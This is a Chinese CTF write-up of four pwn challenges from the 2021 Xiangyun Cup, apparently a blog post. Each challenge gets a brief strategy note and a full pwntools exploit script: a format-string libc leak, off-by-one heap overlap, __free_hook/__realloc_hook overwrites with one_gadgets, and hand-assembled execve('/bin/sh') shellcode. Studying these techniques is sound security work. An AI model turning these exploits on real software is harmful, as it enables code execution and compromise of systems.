2021祥云杯 pwn wp

29 篇文章 0 订阅

 前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下

note:
思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce
exp:

#coding:utf-8
from pwn import *
context.log_level = "debug"
p = process("./note")
libc = ELF("./libc-2.23.so")
#libc=ELF('/home/roo/桌面/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
#p = remote("47.104.70.90",25315)
elf = ELF("./note")
 
def add(size,content):
    p.recvuntil("choice: ")
    p.sendline("1")
    p.sendlineafter("size: ",str(size))
    p.sendlineafter("content: ",content)
    p.recvuntil("addr: ")
    #heap_addr = int(p.recv(6).ljust(8,"\x00"))
 
def show():
    p.recvuntil("choice: ")
    p.sendline("3")
    p.recvuntil("content:")
    content = p.recv()
 
    
    
    
gdb.attach(p,'$rebase 0x1235')
p.recvuntil("choice: ")    
p.sendline("2")
p.recvuntil("say ? ")
p.sendline("%7$s\x00")
 
payload = p64(0xfbad1800) + p64(0)*3
p.sendline(payload)
raw_input()
 
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) -0x3c36e0
malloc_hook = libc_base + libc.sym["__malloc_hook"]
success("libc_base:"+hex(libc_base))
success("malloc_hook:"+hex(malloc_hook))
rce =0x4527a + libc_base
 
realloc = libc_base + libc.sym["realloc"] 
realloc_hook = libc_base + libc.sym["__realloc_hook"]
 
 
payload = "%7$s\x00\x00\x00\x00"+p64(realloc_hook)
p.recvuntil("choice: ")
p.sendline("2")
p.recvuntil("say ? ")
p.sendline(payload)
raw_input()
#gdb.attach(p)
payload = p64(rce) + p64(realloc+6)
p.recvuntil("? ")
p.sendline(payload)
 
p.sendlineafter("choice:","1")
p.sendlineafter("size:","2")
 
p.interactive()

PassWordBox_FreeVersion:
这题难点就是没难点,当时找到一个加密发现加密这玩意不知道咋用,表现出了菜,后来一个re yeye告诉我这道题可以直接泄露,因为异或的是固定值,才知道了原来是这样,并且还有off-by-one,可以构造chunk overlap,泄露libc,打freehook为rce,即可

exp:

#coding:utf8
from pwn import *
sh = process('./pwdFree')
#sh = remote('47.104.71.220',38562)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
 
def add(index,size,content):
   sh.sendlineafter('Choice:','1')
   sh.sendlineafter('Save:',str(index))
   sh.sendlineafter('Pwd:',str(size))
   sh.sendafter('Pwd:',content)
 
def edit(index,content):
   sh.sendlineafter('Choice:','2')
   sh.sendline(str(index))
   sleep(0.5)
   sh.send(content)
 
def show(index):
   sh.sendlineafter('Choice:','3')
   sh.sendlineafter('Check:',str(index))
 
def delete(index):
   sh.sendlineafter('Choice:','4')
   sh.sendlineafter('Delete:',str(index))
 
add(0,1,'\x00')
sh.recvuntil('Save ID:')
random = u64(sh.recv(8))
print 'cookie=',hex(random)
add(1,0xF0,'a'*0xF0) #1
add(2,0x80,'b'*0x80) #2
add(3,0x80,'c'*0x80) #3
add(4,0xF0,'d'*0xF0) #4
 
for i in range(5,12):
   add(i,0xF0,'aaaa'*0xd0)
for i in range(5,12):
   delete(i)
delete(3)
 
add(3,0x88,'b'*0x80 + p64((0x100 + 0x90 + 0x90) ^ random) + '\x00')
delete(1)
delete(4)
for i in range(5,12):
   add(i,0xF0,'a'*0xf0)
add(1,0xF0,'a'*0xF0) #1
show(2)
sh.recvuntil('Pwd is: ')
libc_base = (u64(sh.recv(8)) ^ random) - 0x3ebca0
system_addr = libc_base + libc.sym['system']
free_hook_addr = libc_base + libc.sym['__free_hook']
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL
 
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL
 
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
  '''
onegdaget=0x4f432
delete(3)
add(3,0x98,'b'*0x80 + (p64(0 ^ random) + p64(0x91 ^ random) + p64(free_hook_addr ^ random)))
add(20,0x80,p64(0) + 'c'*0x78)
add(21,0x80,p64(onegdaget ^ random) + 'd'*0x78)
 
 
delete(11)
 
sh.interactive()

JigSaw'sCage :
思路:test有可执行权限,开头有长整型溢出,赋予权限,然后写shellcode。进行打即可

exp:

from pwn import *
context.log_level = 'debug'
p = process('./JigSAW')
context.arch = "amd64"
def add(idx):
    p.sendlineafter("Choice :", "1")
    p.sendlineafter("Index? :", str(idx))
def show(idx):
    p.sendlineafter("Choice :", "5")
    p.sendlineafter("Index? :", str(idx))
def edit(idx, content):
    p.sendlineafter("Choice :", "2")
    p.sendlineafter("Index? :", str(idx))
    p.sendafter("iNput:", content)
def free(idx):
    p.sendlineafter("Choice :", "3")
    p.sendlineafter("Index? :", str(idx))
def test(idx):
    p.sendlineafter("Choice :", "4")
    p.sendlineafter("Index? :", str(idx))
s1 = asm("mov rsp, rdx\nadd rsp, 0x20\npush rsp")
s2 = asm("mov rax, 0x68732f6e69622f\nadd rsp, 0x20\npush rsp")
s3 = asm("push rax\nmov rdi, rsp\nxor rsi, rsi\nadd rsp, 0x28\npush rsp")
s4 = asm("xor rdx, rdx\nmov rax, 59\nsyscall\n")
p.sendlineafter("Name:", "max")
p.sendlineafter("Choice:", str(0xffffffff+1))  #int len overlap
add(0)
add(1)
add(2)
add(3)
edit(0,s1)
edit(1, s2)
edit(2, s3)
edit(3, s4)
test(0)
p.interactive()

lemmon:
思路:这题弄麻烦拉,用secomp开到了开启沙箱,就开始想到了打srop,然后出flag,但是看到别的队有使用edit任意写name,然后再进行栈溢出,修改最后几位为栈上flag地址(这里概率很小所以成功1/2000多吧),然后free掉,通过不断的申请,申请到flag内容输出flag,,但这是最好用的方法,但是这里我采用了srop,由于版本是在libc2.26,这里申请freehook遇到了问题,只能申请到mallochook,所以这里采用了一个大胆的想法,就是在mallochook构建一个size,绕过check,再进行不断的申请即可申请到freehook,再设置freehook为setcontext,然后在freehook布置rop,赋予权限,打即可出flag

打栈地址的exp:

from pwn import *
def add(idx, name, size, msg):
    p.sendlineafter(">> ", "1")
    p.sendlineafter("emon: \n", str(idx))
    p.sendafter("emon: \n", name)
    p.sendlineafter("emon: \n", str(size))
    p.sendafter("age: \n",msg)
def edit(idx,msg):
    p.sendlineafter('>>> ','4')
    p.sendafter("Input the index of your lemon  : \n", str(idx))
    p.sendafter("Now it's your time to draw and color!\n", msg)
def free(idx):
    p.sendlineafter(">>> ", "3")
    p.sendlineafter("emon : \n", str(idx))
p=process('./lemon_pwn')
 
context.log_level = 'debug'
p.sendlineafter('me?\n','yes')
p.sendafter('number: \n','111111')
p.sendafter('first: \n','1'*0x10+p32(0x300)+'\x01')
 
p.recvuntil("0x") 
low = int(p.recv(3),16) 
print hex(low) 
 
edit(-260, "1"*0x138+p16(low+0xe000-0x40))
add(0,"A",0x500,"a")
free(0)
add(1, "\x10", 0x10, "a") 
add(0, "\x10", 0x10, "a")
add(0, "\x20", 0x500, "a")
p.interactive()

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值